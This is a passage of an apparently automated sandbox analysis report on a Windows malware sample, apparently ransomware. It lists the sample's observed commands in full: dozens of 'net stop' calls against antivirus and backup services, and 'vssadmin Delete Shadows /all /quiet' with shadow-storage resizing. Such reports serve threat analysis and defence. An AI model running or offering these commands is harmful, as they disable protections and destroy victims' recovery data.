privilege_name: SeBackupPrivilege
success 1 0
1619396145.827374
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396149.420751
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396149.999876
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396150.842001
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396151.452374
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396152.014499
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396152.639251
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396153.233251
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
Uses Windows utilities for basic Windows functionality (50 out of 68 events)
cmdline net stop MsDtsServer110 /y
cmdline net stop McShield /y
cmdline cmd.exe /c net stop EPSecurityService /y
cmdline cmd.exe /c net stop BackupExecAgentBrowser /y
cmdline net stop MsDtsServer /y
cmdline net stop DCAgent /y
cmdline net stop MsDtsServer100 /y
cmdline cmd.exe /c net stop FA_Scheduler /y
cmdline cmd.exe /c net stop BackupExecVSSProvider /y
cmdline cmd.exe /c net stop AcronisAgent /y
cmdline net stop BackupExecVSSProvider /y
cmdline cmd.exe /c net stop "SQLsafe Backup Service" /y
cmdline cmd.exe /c net stop "SQLsafe Filter Service" /y
cmdline net stop EPUpdateService /y
cmdline net stop "Veeam Backup Catalog Data Service" /y
cmdline cmd.exe /c net stop BackupExecManagementService /y
cmdline net stop "SQLsafe Backup Service" /y
cmdline net stop MMS /y
cmdline cmd.exe /c net stop McShield /y
cmdline cmd.exe /c net stop Antivirus /y
cmdline net stop EPSecurityService /y
cmdline cmd.exe /c net stop "Enterprise Client Service" /y
cmdline cmd.exe /c net stop BackupExecRPCService /y
cmdline cmd.exe /c net stop BackupExecDeviceMediaService /y
cmdline net stop Antivirus /y
cmdline cmd.exe /c net stop mfemms /y
cmdline cmd.exe /c net stop McTaskManager /y
cmdline net stop BackupExecAgentAccelerator /y
cmdline net stop bedbg /y
cmdline cmd.exe /c net stop mozyprobackup /y
cmdline net stop IISAdmin /y
cmdline cmd.exe /c net stop MsDtsServer /y
cmdline net stop McTaskManager /y
cmdline cmd.exe /c net stop AcrSch2Svc /y
cmdline cmd.exe /c net stop "Acronis VSS Provider" /y
cmdline cmd.exe /c net stop DCAgent /y
cmdline net stop mfevtp /y
cmdline cmd.exe /c net stop EsgShKernel /y
cmdline net stop BackupExecRPCService /y
cmdline net stop "SQLsafe Filter Service" /y
cmdline cmd.exe /c net stop ARSM /y
cmdline net stop BackupExecAgentBrowser /y
cmdline net stop mfemms /y
cmdline cmd.exe /c net stop MMS /y
cmdline net stop FA_Scheduler /y
cmdline cmd.exe /c net stop IMAP4Svc /y
cmdline net stop BackupExecManagementService /y
cmdline cmd.exe /c net stop EraserSvc11710 /y
cmdline net stop BackupExecJobEngine /y
cmdline cmd.exe /c net stop bedbg /y
Network communication
Communicates with host for which no DNS query was performed (1 event)
host 172.217.24.14
Removes the Shadow Copy to avoid recovery of the system (1 event)
cmdline vssadmin Delete Shadows /all /quiet
Uses suspicious command line tools or Windows utilities (26 events)
cmdline vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
cmdline cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
cmdline vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
cmdline cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
cmdline vssadmin Delete Shadows /all /quiet
cmdline vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
cmdline cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
cmdline cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
cmdline cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
cmdline vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
cmdline vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
cmdline vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
cmdline vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
cmdline cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
cmdline cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
cmdline cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
cmdline vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
cmdline vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
cmdline cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
cmdline vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
cmdline vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
cmdline cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
cmdline cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
cmdline vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
cmdline cmd.exe /c vssadmin Delete Shadows /all /quiet
cmdline cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
Connects to IP addresses that are no longer responding to requests (legitimate services usually remain up and running) (2 events)
dead_host 172.217.24.14:443
dead_host 216.58.200.238:443
Visual analysis
Binary image
No binary image (no binary visualization image was generated for this sample)
Runtime screenshots
No runtime screenshots (no screenshots were generated while the sample ran)

PE Compile Time

2020-06-04 08:02:10

Imports

Library SHLWAPI.dll:
0x419030 StrStrIA
Library KERNEL32.dll:
0x419000 GetCommandLineW
0x419004 lstrcpyA
0x419008 LoadLibraryA
0x41900c GetProcAddress
0x419010 lstrcmpiW
0x419014 CreateMutexA
0x419018 ReleaseMutex
0x41901c MultiByteToWideChar
0x419020 CloseHandle
Library SHELL32.dll:
0x419028 CommandLineToArgvW

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 60215 114.114.114.114 53
192.168.56.101 60384 114.114.114.114 53
192.168.56.101 63429 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56539 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 58367 224.0.0.252 5355
192.168.56.101 61680 224.0.0.252 5355
192.168.56.101 62318 224.0.0.252 5355
192.168.56.101 65004 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 51379 239.255.255.250 3702

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.